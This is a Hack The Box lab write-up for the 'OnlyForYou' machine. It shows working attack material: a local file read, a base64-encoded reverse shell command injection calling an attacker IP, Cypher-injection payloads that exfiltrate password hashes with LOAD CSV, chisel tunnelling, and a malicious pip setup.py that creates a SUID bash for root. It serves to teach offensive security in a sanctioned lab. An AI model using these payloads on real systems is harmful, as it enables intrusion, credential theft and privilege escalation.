# OnlyForYou - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

OnlyForYou is an outstanding medium-rated HTB machine created by [0xM4hm0ud](https://twitter.com/0xM4hm0ud)

A local file read and OS command injection lead to foothold on this box.  
Then, port forwarding with `chisel` and a `neo4j` cypher injection are required to get user credentials.  
Root involves creating a malicious `pip` package to abuse `pip download`.

## Initial recon

```console
opcode@parrot$ nmap -v -p- 10.10.11.210
Nmap scan report for 10.10.11.210
Host is up (0.087s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```

```console
opcode@parrot$ nmap -sC -sV -p 22,80 -oN onlyforyou.nmap 10.10.11.210
Nmap scan report for 10.10.11.210
Host is up (0.088s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e8:83:e0:a9:fd:43:df:38:19:8a:aa:35:43:84:11:ec (RSA)
|   256 83:f2:35:22:9b:03:86:0c:16:cf:b3:fa:9f:5a:cd:08 (ECDSA)
|_  256 44:5f:7a:a3:77:69:0a:77:78:9b:04:e0:9f:11:db:80 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://only4you.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

The usual SSH (22) and HTTP (80) ports are open.

The website on port 80 redirects us to <http://only4you.htb/>  
Hence, I added this line to `/etc/hosts`:

```text
10.10.11.210 only4you.htb
```

The home page:

![1](images/1.png)

Some potential usernames can be found, but it seems to be a static website.

Enumerating routes with `ffuf` didn't bring any result.  
I tried to enumerate subdomains as well:

```console
opcode@parrot$ ffuf -c -w ~/cybersec/wordlists/subdomains-top1million-20000.txt -u http://only4you.htb -H "Host: FUZZ.only4you.htb" -r -fs 34125 2>/dev/null
beta                    [Status: 200, Size: 2191, Words: 370, Lines: 52, Duration: 93ms]
```

Therefore, I updated `/etc/hosts`:

```text
10.10.11.210 only4you.htb beta.only4you.htb
```

The home page for `beta` subdomain:

![2](images/2.png)

The website allows us to resize images, convert JPG images to PNG, and vice versa.  
The source code has been provided.

## Local File Read and OS command injection

In the source, the `/download` route looks particularly questionable:

```py
@app.route('/download', methods=['POST'])
def download():
    image = request.form['image']
    filename = posixpath.normpath(image) 
    if '..' in filename or filename.startswith('../'):
        flash('Hacking detected!', 'danger')
        return redirect('/list')
    if not os.path.isabs(filename):
        filename = os.path.join(app.config['LIST_FOLDER'], filename)
    try:
        if not os.path.isfile(filename):
            flash('Image doesn\'t exist!', 'danger')
            return redirect('/list')
    except (TypeError, ValueError):
        raise BadRequest()
    return send_file(filename, as_attachment=True)
```

Using home-baked filters for security issues is an anti-pattern. Whenever I find one of those in a flask application, I compare it against the gold standard: `werkzeug`'s [safe_join](https://github.com/pallets/werkzeug/blob/main/src/werkzeug/security.py#L127):

```py
def safe_join(directory: str, *pathnames: str) -> str | None:
    """Safely join zero or more untrusted path components to a base
    directory to avoid escaping the base directory.

    :param directory: The trusted base directory.
    :param pathnames: The untrusted path components relative to the
        base directory.
    :return: A safe path, otherwise ``None``.
    """
    if not directory:
        # Ensure we end up with ./path if directory="" is given,
        # otherwise the first untrusted part could become trusted.
        directory = "."

    parts = [directory]

    for filename in pathnames:
        if filename != "":
            filename = posixpath.normpath(filename)

        if (
            any(sep in filename for sep in _os_alt_seps)
            or os.path.isabs(filename)
            or filename == ".."
            or filename.startswith("../")
        ):
            return None

        parts.append(filename)

    return posixpath.join(*parts)
```

On the surface, the author seems to have managed to cover all the bases, but there's a glaring hole.  
When I first saw this code, I thought of the quirk with `os.path.join` (it throws away all previous components if any component is an absolute path.)  
However, the author has taken it into account and ensures that absolute paths do not get passed.  
But this `os.path.join` quirk does not even matter.

In the `werkzeug`'s `safe_join`, they disallow all absolute paths.  
In this home-baked filter, they do not disallow absolute paths; they only ensure that absolute paths are not passed to `os.path.join`.  
Therefore, we can just set `filename` to an absolute path and read local files.

```console
opcode@parrot$ curl -X POST 'http://beta.only4you.htb/download' -d 'image=/etc/passwd'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
[--SNIP--]
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
john:x:1000:1000:john:/home/john:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:117:MySQL Server,,,:/nonexistent:/bin/false
neo4j:x:997:997::/var/lib/neo4j:/bin/bash
dev:x:1001:1001::/home/dev:/bin/bash
fwupd-refresh:x:114:119:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
_laurel:x:996:996::/var/log/laurel:/bin/false
```

I noticed that `neo4j` user has shell access. That's normal for systems with `neo4j` installed, buut I have never seen that on an HTB box before.

I also tried reading from `proc` file-system, but they came out empty.  
I also tried reading `id_rsa` and `id_ecdsa` from the home directories of `dev` and `john`, but failed.

Next, I tried apache conf:

```console
opcode@parrot$ curl -X POST 'http://beta.only4you.htb/download' -d 'image=/etc/nginx/sites-enabled/default'
server {
    listen 80;
    return 301 http://only4you.htb$request_uri;
}

server {
    listen 80;
    server_name only4you.htb;

    location / {
                include proxy_params;
                proxy_pass http://unix:/var/www/only4you.htb/only4you.sock;
    }
}

server {
    listen 80;
    server_name beta.only4you.htb;

        location / {
                include proxy_params;
                proxy_pass http://unix:/var/www/beta.only4you.htb/beta.sock;
        }
}
```

I already had the source code for `beta.only4you.htb`, so I looked at the source for `only4you.htb`, hoping to get credentials.  
I guessed the name to be `app.py` here as well, and it worked:

```console
opcode@parrot$ curl -X POST 'http://beta.only4you.htb/download' -d 'image=/var/www/only4you.htb/app.py'
```

```py
from flask import Flask, render_template, request, flash, redirect
from form import sendmessage
import uuid

app = Flask(__name__)
app.secret_key = uuid.uuid4().hex

@app.route('/', methods=['GET', 'POST'])
def index():
    if request.method == 'POST':
        email = request.form['email']
        subject = request.form['subject']
        message = request.form['message']
        ip = request.remote_addr

        status = sendmessage(email, subject, message, ip)
        if status == 0:
            flash('Something went wrong!', 'danger')
        elif status == 1:
            flash('You are not authorized!', 'danger')
        else:
            flash('Your message was successfuly sent! We will reply as soon as possible.', 'success')
        return redirect('/#contact')
    else:
        return render_template('index.html')

@app.errorhandler(404)
def page_not_found(error):
    return render_template('404.html'), 404

@app.errorhandler(500)
def server_errorerror(error):
    return render_template('500.html'), 500

@app.errorhandler(400)
def bad_request(error):
    return render_template('400.html'), 400

@app.errorhandler(405)
def method_not_allowed(error):
    return render_template('405.html'), 405

if __name__ == '__main__':
    app.run(host='127.0.0.1', port=80, debug=False)
```

Everything but the `form` is static:

```console
opcode@parrot$ curl -X POST 'http://beta.only4you.htb/download' -d 'image=/var/www/only4you.htb/form.py'
```

```py
import smtplib, re
from email.message import EmailMessage
from subprocess import PIPE, run
import ipaddress

def issecure(email, ip):
    if not re.match("([A-Za-z0-9]+[.-_])*[A-Za-z0-9]+@[A-Za-z0-9-]+(\.[A-Z|a-z]{2,})", email):
        return 0
    else:
        domain = email.split("@", 1)[1]
        result = run([f"dig txt {domain}"], shell=True, stdout=PIPE)
        output = result.stdout.decode('utf-8')
        if "v=spf1" not in output:
            return 1
        else:
            domains = []
            ips = []
            if "include:" in output:
                dms = ''.join(re.findall(r"include:.*\.[A-Z|a-z]{2,}", output)).split("include:")
                dms.pop(0)
                for domain in dms:
                    domains.append(domain)
                while True:
                    for domain in domains:
                        result = run([f"dig txt {domain}"], shell=True, stdout=PIPE)
                        output = result.stdout.decode('utf-8')
                        if "include:" in output:
                            dms = ''.join(re.findall(r"include:.*\.[A-Z|a-z]{2,}", output)).split("include:")
                            domains.clear()
                            for domain in dms:
                                domains.append(domain)
                        elif "ip4:" in output:
                            ipaddresses = ''.join(re.findall(r"ip4:+[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+[/]?[0-9]{2}", output)).split("ip4:")
                            ipaddresses.pop(0)
                            for i in ipaddresses:
                                ips.append(i)
                        else:
                            pass
                    break
            elif "ip4" in output:
                ipaddresses = ''.join(re.findall(r"ip4:+[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+[/]?[0-9]{2}", output)).split("ip4:")
                ipaddresses.pop(0)
                for i in ipaddresses:
                    ips.append(i)
            else:
                return 1
        for i in ips:
            if ip == i:
                return 2
            elif ipaddress.ip_address(ip) in ipaddress.ip_network(i):
                return 2
            else:
                return 1

def sendmessage(email, subject, message, ip):
    status = issecure(email, ip)
    if status == 2:
        msg = EmailMessage()
        msg['From'] = f'{email}'
        msg['To'] = 'info@only4you.htb'
        msg['Subject'] = f'{subject}'
        msg['Message'] = f'{message}'

        smtp = smtplib.SMTP(host='localhost', port=25)
        smtp.send_message(msg)
        smtp.quit()
        return status
    elif status == 1:
        return status
    else:
        return status
```

A command injection vulnerability is present:

```py
        domain = email.split("@", 1)[1]
        result = run([f"dig txt {domain}"], shell=True, stdout=PIPE)
```

But there's a regex condition that needs a workaround.  
I have to relearn regex every time I deal with it, so I threw the code at [ChatGPT](https://chat.openai.com/) and asked it to find the vulnerability and payload. It found a reasonable payload:

![3](images/3.png)

I think using `$()` for command injection is more reliable than using `;`  
I tried a reverse shell payload next:

```console
opcode@parrot$ curl -X POST 'http://only4you.htb' -d 'name=abcd&email=opcode@gmail.com$(echo YmFzaCAtYyAnYmFzaCAtaSAgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTQ3LzkwMDEgMD4mMScK | base64 -d | bash)&subject=opcode&message=opcode'
```

It worked, and I got a shell as `www-data`.

I stabilized the shell:

```console
www-data@only4you:~$ python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@only4you:~$ ^Z
opcode@parrot$ stty raw -echo; fg
www-data@only4you:~$ export TERM=xterm-256color
www-data@only4you:~$ exec /bin/bash
```

## Tunneling with `chisel`

I transferred `linpeas.sh` to the box, but nothing in the output caught my attention.  
Also, `/proc` has been mounted with the `hidepid=2` option. Therefore, `pspy` is ineffective:

```console
www-data@only4you:~$ cat /proc/mounts | grep proc
proc /proc proc rw,nosuid,nodev,noexec,relatime,hidepid=2 0 0
systemd-1 /proc/sys/fs/binfmt_misc autofs rw,relatime,fd=28,pgrp=1,timeout=0,minproto=5,maxproto=5,direct,pipe_ino=26758 0 0
```

I also uploaded and ran [miniss](https://github.com/noraj/miniss):

```console
www-data@only4you:/tmp$ ./miniss -t
type local address        remote address        state       username (uid)
tcp  127.0.0.1:33060      0.0.0.0:0             LISTEN      mysql (113)
tcp  127.0.0.1:3306       0.0.0.0:0             LISTEN      mysql (113)
tcp  0.0.0.0:80           0.0.0.0:0             LISTEN      root (0)
tcp  127.0.0.53:53        0.0.0.0:0             LISTEN      systemd-resolve (101)
tcp  0.0.0.0:22           0.0.0.0:0             LISTEN      root (0)
tcp  127.0.0.1:3000       0.0.0.0:0             LISTEN      dev (1001)
tcp  127.0.0.1:8001       0.0.0.0:0             LISTEN      dev (1001)
tcp  10.10.11.210:55032   8.8.8.8:53            SYN_SENT    systemd-resolve (101)
tcp  127.0.0.1:41206      127.0.0.1:7687        ESTABLISHED dev (1001)
tcp  10.10.11.210:39236   10.10.14.147:9001     ESTABLISHED www-data (33)
tcp  127.0.0.1:46846      127.0.0.1:7687        ESTABLISHED dev (1001)
tcp  127.0.0.1:42554      127.0.0.1:7687        ESTABLISHED dev (1001)
tcp  [::ffff:7f00:1]:7687 [::]:0                LISTEN      neo4j (997)
tcp  [::ffff:7f00:1]:7474 [::]:0                LISTEN      neo4j (997)
tcp  [::]:22              [::]:0                LISTEN      root (0)
tcp  [::ffff:7f00:1]:7687 [::ffff:7f00:1]:41206 ESTABLISHED neo4j (997)
tcp  [::ffff:7f00:1]:7687 [::ffff:7f00:1]:46846 ESTABLISHED neo4j (997)
tcp  [::ffff:7f00:1]:7687 [::ffff:7f00:1]:42554 ESTABLISHED neo4j (997)
```

[chisel](https://github.com/jpillora/chisel) can be used to forward ports 3000, 3000, 7687, and 7474.  
The latter two are used by `neo4j`.

On my system, I ran:

```console
opcode@parrot$ ./chisel server -p 9999 --reverse -v
```

And on the box:

```console
www-data@only4you:/tmp$ ./chisel client 10.10.14.147:9999 R:8001:127.0.0.1:8001 R:3000:127.0.0.1:3000 R:7474:127.0.0.1:7474 R:7687:127.0.0.1:7687
```

Initially, I had tried dynamic forwarding, but the websites were not loading.  
HTB boxes don't have internet, and those websites were likely trying to load external scripts through the HTB network.

A Gogs instance is running on <http://127.0.0.1:3000/>.  
There are two users: `john` and `administrator`, but all their repos are private.

![4](images/4.png)

Port 7687 is used for [bolt protocol](https://neo4j.com/docs/bolt/current/bolt/)  
I tried interacting with it using the default credentials of `neo4j:neo4j` but got weird errors.

```py
from neo4j import GraphDatabase, RoutingControl

uri = "bolt://127.0.0.1:7687"
driver = GraphDatabase.driver(uri, auth=("neo4j", "neo4j"), encrypted=True)

records, _, _ = driver.execute_query(
    "MATCH (a:User) WHERE a.name = $name "
    "RETURN a.name",
    name="john", database_="neo4j", routing_=RoutingControl.READ,
)

print(records)
```

```console
opcode@parrot$ python3 -m pip install neo4j
opcode@parrot$ python3 dbtest.py
Transaction failed and will be retried in 1.1198129566233126s (Couldn't connect to 127.0.0.1:7687 (resolved to ()):
[SSLEOFError] Connection Failed. Please ensure that your database is listening on the correct host and port and that you have enabled encryption if required. Note that the default encryption setting has changed in Neo4j 4.0. See the docs for more information. Failed to establish encrypted connection. (code 8: Exec format error))
```

`neo4j` browser is running on <http://127.0.0.1:7474/browser/>:

![5](images/5.png)

The default credentials are `neo4j:neo4j`, but they get changed on first use.  
As expected, authentication failed with `neo4j:neo4j`

Something custom is running on <http://127.0.0.1:8001>, it immediately redirects to <http://127.0.0.1:8001/login>:

![6](images/6.png)

## `neo4j` cypher injection

I tried basic SQL injection payloads on the login page but they didn't work.  
I also tried `admin:admin` and it worked. Still, I was getting redirected to `/dashboard` and then back to `/login`  
After a while, I realised that my system time needed to be corrected. The session cookies assigned to me had already expired from a validation perspective.

I tried editing user profile to test for SSTI, but it failed. Those features aren't implemented.  
On the dashboard, they have a list of tasks. Among them, "Migrated to a new database(neo4j)" is a finished task.  
This implies that `neo4j` is being used.

On the employees page, there is a search bar. An empty search brings forth the list of employees.  
When I threw [sqlmap](https://github.com/sqlmapproject/sqlmap) at it, it found a boolean-based blind injection but couldn't fingerprint the back-end database.

I googled for `neo4j` cypher injection and found a very neat article:  
<https://www.varonis.com/blog/neo4jection-secrets-data-and-cloud-exploits>  
The author of this blog also has a talk at Insomnihack: [Secrets, Data And Cypher-injections: Neo4j Attacks & Cloud Exploits](https://www.youtube.com/watch?v=nV1ecGL_-tw)  
I highly recommend going through them both as the article explains everything needed to understand this attack, and the talk has a demonstration.

When I did the box, I had used a simple `http.server`, but now I have a python script (thanks ChatGPT) that prints the path (in tabular format) and throws out everything else: [httpserver.py](httpserver.py):

```py
from socket import socket, AF_INET, SOCK_STREAM


def get_queries(path):
    data = {}
    queries = path.split('&')
    for query in queries:
        key, value = query.split('=')
        data[key] = value

    return data


def draw_table(data_dict):
    max_key_length = max(len(str(key)) for key in data_dict.keys())
    max_value_length = max(len(str(value)) for value in data_dict.values())

    top_border = f'┌{"─" * (max_key_length + 2)}┬{"─" * (max_value_length + 2)}┐'
    middle_border = f'├{"─" * (max_key_length + 2)}┼{"─" * (max_value_length + 2)}┤'
    bottom_border = f'└{"─" * (max_key_length + 2)}┴{"─" * (max_value_length + 2)}┘'

    table = [top_border,
             f'│ Key{" " * (max_key_length - 3)} │ Value{" " * (max_value_length - 5)} │',
             middle_border]

    for key, value in data_dict.items():
        table.append(f'│ {str(key).ljust(max_key_length)} │ {str(value).ljust(max_value_length)} │')

    table.append(bottom_border)

    return '\n'.join(table)


def print_path(clientsocket):
    request_line = clientsocket.recv(1024).split(b'\r\n')[0]
    path = request_line.split(b'/')[1].rstrip(b' HTTP').decode()
    if path.startswith('?'):
        print(draw_table(get_queries(path[1:])))
    else:
        print(path)

    response = 'HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n'
    clientsocket.send(response.encode())
    clientsocket.close()


def listener(host, port):
    serversocket = socket(AF_INET, SOCK_STREAM)
    serversocket.bind((host, port))
    serversocket.listen(1)

    print(f'\033[93m[-] Listener started\033[0m')

    while True:
        clientsocket, address = serversocket.accept()
        print_path(clientsocket)


if __name__ == '__main__':
    listener('', 8000)
```

I followed along with the demonstration from Insomnihack.  
An empty search brings up the list of employees. Hence, we learn that `Sarah Jhonson` is a valid search query.
First, I tried to find out if exfiltration with LOAD CSV is possible:

```text
search=Sarah Jhonson' LOAD CSV FROM 'http://10.10.14.147:8000/ping' as _l RETURN 1 //
```

It works, and I got a hit. This query can be used to get the version:

```text
search=Sarah Jhonson' CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM 'http://10.10.14.147:8000/?version=' + version + '&name=' + name + '&edition=' + edition as _l RETURN 1 //
```

It did not work initially, but worked after URL encoding:

```text
┌─────────┬──────────────┐
│ Key     │ Value        │
├─────────┼──────────────┤
│ version │ 5.6.0        │
│ name    │ Neo4j Kernel │
│ edition │ community    │
└─────────┴──────────────┘
```

In neo4j 5, `dbms.functions()` and `dbms.procedures()` cannot be used.  
Instead, APOC has to be used to list functions and procedures.

```text
search=Sarah Jhonson' CALL apoc.cypher.run("SHOW PROCEDURES yield name RETURN name",{}) yield value LOAD CSV FROM 'http://10.10.14.147:8000/' + value['name'] as _l RETURN 1 //
```

It failed. APOC is likely not installed.  
APOC would have made everything smoother; the built-in method `db.labels` can be used to list all existing labels:

```text
search=Sarah Jhonson' CALL db.labels() yield label LOAD CSV FROM 'http://10.10.14.147:8000/?l=' + label as _l RETURN 1 //
```

Exfilled data:

```text
┌─────┬───────┐
│ Key │ Value │
├─────┼───────┤
│ l   │ user  │
└─────┴───────┘
┌─────┬──────────┐
│ Key │ Value    │
├─────┼──────────┤
│ l   │ employee │
└─────┴──────────┘
```

Finally, I enumerated node properties and their values with this query:

```text
search=Sarah Jhonson' WITH 1 as a MATCH (f:user) UNWIND keys(f) as p LOAD CSV FROM 'http://10.10.14.147:8000/?' + p + '=' + toString(f[p]) as _l RETURN 1 //
```

Exfilled data:

```text
┌──────────┬──────────────────────────────────────────────────────────────────┐
│ Key      │ Value                                                            │
├──────────┼──────────────────────────────────────────────────────────────────┤
│ password │ 8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 │
└──────────┴──────────────────────────────────────────────────────────────────┘
┌──────────┬───────┐
│ Key      │ Value │
├──────────┼───────┤
│ username │ admin │
└──────────┴───────┘
┌──────────┬──────────────────────────────────────────────────────────────────┐
│ Key      │ Value                                                            │
├──────────┼──────────────────────────────────────────────────────────────────┤
│ password │ a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 │
└──────────┴──────────────────────────────────────────────────────────────────┘
┌──────────┬───────┐
│ Key      │ Value │
├──────────┼───────┤
│ username │ john  │
└──────────┴───────┘
```

I tried cracking them on [CrackStation](https://crackstation.net/) and got:

```text
admin:admin
john:ThisIs4You
```

`ThisIs4You` is reused for SSH:

```console
opcode@parrot$ sshpass -p 'ThisIs4You' ssh -o StrictHostKeyChecking=no john@only4you.htb
```

## Creating malicious pip package

```console
john@only4you:~$ sudo -l
Matching Defaults entries for john on only4you:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User john may run the following commands on only4you:
    (root) NOPASSWD: /usr/bin/pip3 download http\://127.0.0.1\:3000/*.tar.gz
```

Googling "pip download exploit" led me to this article:  
<https://embracethered.com/blog/posts/2022/python-package-manager-install-and-download-vulnerability/>

As it turns out, executing the command `pip download package_name` not only downloads the package's files but also runs the command `python3 setup.py egg_info`. Malicious actors heavily exploit this issue.  
The solution is to build wheels. When they are used, `setup.py` is not run. Newer versions of `pip` preferentially use wheels.  
`setup.py` is considered a legacy feature now.  
Even with all that, it is still possible to use `setup.py` and build a malicious `.tar.gz` file. In the absence of `.whl` files, the `.tar.gz` would be used by `pip`

I used the malicious package example from the blog post and modified it to make `bash` a SUID binary.

```console
opcode@parrot$ git clone https://github.com/wunderwuzzi23/this_is_fine_wuzzi/
```

In `setup.py`, I updated the `RunCommand` function:

```py
def RunCommand():
    from os import system
    system("cp /usr/bin/bash /tmp/chisel; chmod u+s /tmp/chisel")
```

The next step is to bundle it up in a package:

```console
opcode@parrot$ sudo apt install python3-build
opcode@parrot$ python3 -m build
```

It built both `this_is_fine_wuzzi-0.0.1.tar.gz` and `this_is_fine_wuzzi-0.0.1-py3-none-any.whl`.

The credentials `john:ThisIs4You` also work on the Gogs instance. I created a new repo: "opcode" (also selected the option to initialize this repository) and uploaded `this_is_fine_wuzzi-0.0.1.tar.gz` there.

Next, I ran:

```console
john@only4you:~$ sudo pip3 download http://127.0.0.1:3000/john/opcode/raw/master/this_is_fine_wuzzi-0.0.1.tar.gz
```

I checked `/tmp/chisel`, and found the SUID permission:

```console
john@only4you:~$ ls -la /tmp/chisel 
-rwsr-xr-x 1 root root 1183448 Sep  6 14:54 /tmp/chisel
```

Therefore, I ran it with `-p` option to not drop the effective user id:

```console
john@only4you:~$ /tmp/chisel -p
chisel-5.0# id
uid=1000(john) gid=1000(john) euid=0(root) groups=1000(john)
```
